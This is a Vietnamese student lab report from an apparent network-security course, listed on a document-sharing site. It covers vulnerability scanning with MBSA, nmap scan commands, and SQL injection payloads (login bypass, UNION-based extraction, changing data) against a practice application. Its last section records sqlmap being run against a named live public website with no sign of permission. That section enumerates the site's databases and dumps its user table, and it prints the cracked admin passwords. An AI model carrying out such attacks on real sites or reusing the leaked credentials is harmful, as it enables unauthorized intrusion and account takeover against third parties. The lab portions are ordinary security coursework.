1. Trang chủ
  2. » Tất cả

Cài đặt và sử dụng các công cụ rà quét lỗ hổng bảo mật và cổng dịch vụ, tấn công chèn mã sql

25 2 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Cài đặt và sử dụng các công cụ rà quét lỗ hổng bảo mật và cổng dịch vụ, tấn công chèn mã SQL
Tác giả Nhóm tác giả
Người hướng dẫn TS. Đặng Minh Tuấn
Trường học Học viện Công nghệ Bưu chính Viễn thông
Chuyên ngành An toàn mạng
Thể loại Báo cáo thực hành
Năm xuất bản 2021
Thành phố Hà Nội
Định dạng
Số trang 25
Dung lượng 4,31 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Cài đặt và sử dụng các công cụ rà quét lỗ hổng bảo mật và cổng dịch vụ .... Quét các hệ thống chạy HDH Windows sử dụng công cụ Microsoft Baseline Security Analyser ...1 1.1.. Cài đặt và

Trang 2

MỤC LỤC

I Cài đặt và sử dụng các công cụ rà quét lỗ hổng bảo mật và cổng dịch vụ 1

1 Quét các hệ thống chạy HDH Windows sử dụng công cụ Microsoft Baseline Security Analyser 1

1.1 Hình ảnh chạy quét hệ thống chạy Windows 7 1

1.2 Phân tích kết quả quét Windows 7 2

2 Rà quét các dịch vụ và lỗ hổng sử dụng công cụ nmap 3

II Tấn công chèn mã SQL 7

1 Vượt qua khâu xác thực người dùng 7

1.1 Đăng nhập tự do 7

1.3 Giải thích kết quả 7

2 Trích xuất dữ liệu từ CSDL 9

2.1 Tìm số trường trong câu truy vấn của trang: 9

2.2 Hiển thị thông tin hệ quản trị CSDL và hệ điều hành 11

2.3 Trích xuất danh sách các bảng của CSDL 12

2.4 Trích xuất danh sách các trường của bảng: 12

2.5 Trích xuất dữ liệu bảng 15

3 Thêm, sửa, xóa dữ liệu 17

3.1 Sửa 17

3.2 Thêm 18

3.3 Xóa 19

3.4 Khảo sát các trang web trên mạng có lỗi chèn mã SQL (không sửa/xóa dữ liệu) 20

Trang 3

I Cài đặt và sử dụng các công cụ rà quét lỗ hổng bảo mật và cổng dịch

Trang 4

2

1.2 Phân tích kết quả quét Windows 7

Local Account Password Test: Có 1 vài tài khoản người dùng không có mật khẩu hoặc mật khẩu yếu

+ Mức độ nguy hiểm: Cao

+ Cách khắc phục: Đặt mật khẩu mạnh (hơn 8 ký tự trong đó gồm có các ký tự thường

và ký tự in hoa, chữ số và ký tự đặc biệt đan xen)

Automatic Updates: Dịch vụ tự động cập nhật đã bị tắt

+ Mức độ nguy hiểm: Cao

+ Cách khắc phục: Bật dịch vụ và đặt chế độ Automatic (Delayed Start)

Password Expiration: Có 1 vài tài khoản người dùng có mật khẩu không có thời hạn + Mức độ nguy hiểm: Trung bình

+ Cách khắc phục: Thay đổi mật khẩu và đặt thời hạn cho những mật khẩu của tài khoản đó

Trang 5

2 Rà quét các dịch vụ và lỗ hổng sử dụng công cụ nmap

Quét kết nối TCP: nmap –sT <target>

Quét kết nối UDP: nmap –sU <target>

Trang 6

4 Quét ARP ping: nmap –sP <target>

FIN Scan: nmap –sF <target>

Trang 7

XMAS Scan: nmap –sX <target>

Quét ICMP(ping): nmap –sN <target>

Trang 8

6 Quét dịch vụ và phiên bản: nmap –sV <target>

Quét thông tin máy và xác định hệ điều hành: nmap -sS -P0 -sV -O <target>

Trang 10

+ Mà 1=1 luôn đúng nên câu truy vấn sẽ tìm được ngay hàng đầu tiên và ta đăng nhập

được vào tài khoản ở hàng đầu tiên trong tbl_users

Ở khâu đăng nhập vào một tài khoản chi tiết ta có câu lệnh SQL là:

SELECT TOP 1 * FROM tbl_users WHERE username = 'david' ' AND password = '1'

+ Khi câu truy vấn được thực hiện thì sẽ chỉ tìm hàng đầu tiên có username = ‘david’ còn

các điều kiện còn lại nằm sau dấu ‘ ’ để comment nên bỏ qua

+ Trong tbl_user có username = ‘david’ nên ta đăng nhập vào được hệ thống với tài

khoản david mà không cần đúng mật khẩu

Trang 11

2 Trích xuất dữ liệu từ CSDL

2.1 Tìm số trường trong câu truy vấn của trang:

ip%' order by 1;

ip%' order by 2;

Trang 12

10

ip%' order by 3;

ip%' order by 4;

 Có 3 trường

Trang 13

ip%' union select '1', '2', '3';

2.2 Hiển thị thông tin hệ quản trị CSDL và hệ điều hành

Trang 14

12

2.3 Trích xuất danh sách các bảng của CSDL

2.4 Trích xuất danh sách các trường của bảng:

tbl_user

Trang 15

tbl_test

tbl_products

Trang 16

14

tbl_administrators

students

Trang 17

2.5 Trích xuất dữ liệu bảng

tbl_user

tbl_test

Trang 18

16

tbl_products

tbl_administrators

Trang 19

3 Thêm, sửa, xóa dữ liệu

3.1 Sửa

Trang 20

18

Sửa password của david thành test kết quả:

3.2 Thêm

Trang 21

Thêm tài khoản tom và kết quả:

3.3 Xóa

Trang 22

20

Xóa tài khoản tom và kết quả

3.4 Khảo sát các trang web trên mạng có lỗi chèn mã SQL (không sửa/xóa dữ liệu)

Thực hành trên trang http://tapiocafeedfood.com sử dụng SQLMap trên Kali Linux

Lệnh: sqlmap -u "http://tapiocafeedfood.com/?php=product_detail&id=300" –dbs

Trang 23

Kết quả ta nhận được hai bảng dbs: “information_schema” và “vietfarmgr_ha”

Tiếp tục sử dụng lệnh: sqlmap -u

"http://tapiocafeedfood.com/?php=product_detail&id=300" tables -D vietfarmgr_ha để

truy cập vào các trường trong database ta nhận được các trường:

Kết quả ta tìm được các trường: tbl_config, tbl_content, tbl_content_category, tbl_product, tbl_product_category, tbl_product_new, | tbl_product_special, tbl_user, tbl_visitor

Trang 25

Truy cập tiếp tục vào các trường trong bảng ta nhận được username và pwd ở dạng hashed → Decode ta nhận được mật khẩu lần lượt là coder và 123456789s

Ngày đăng: 26/02/2023, 15:06

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

🧩 Sản phẩm bạn có thể quan tâm

w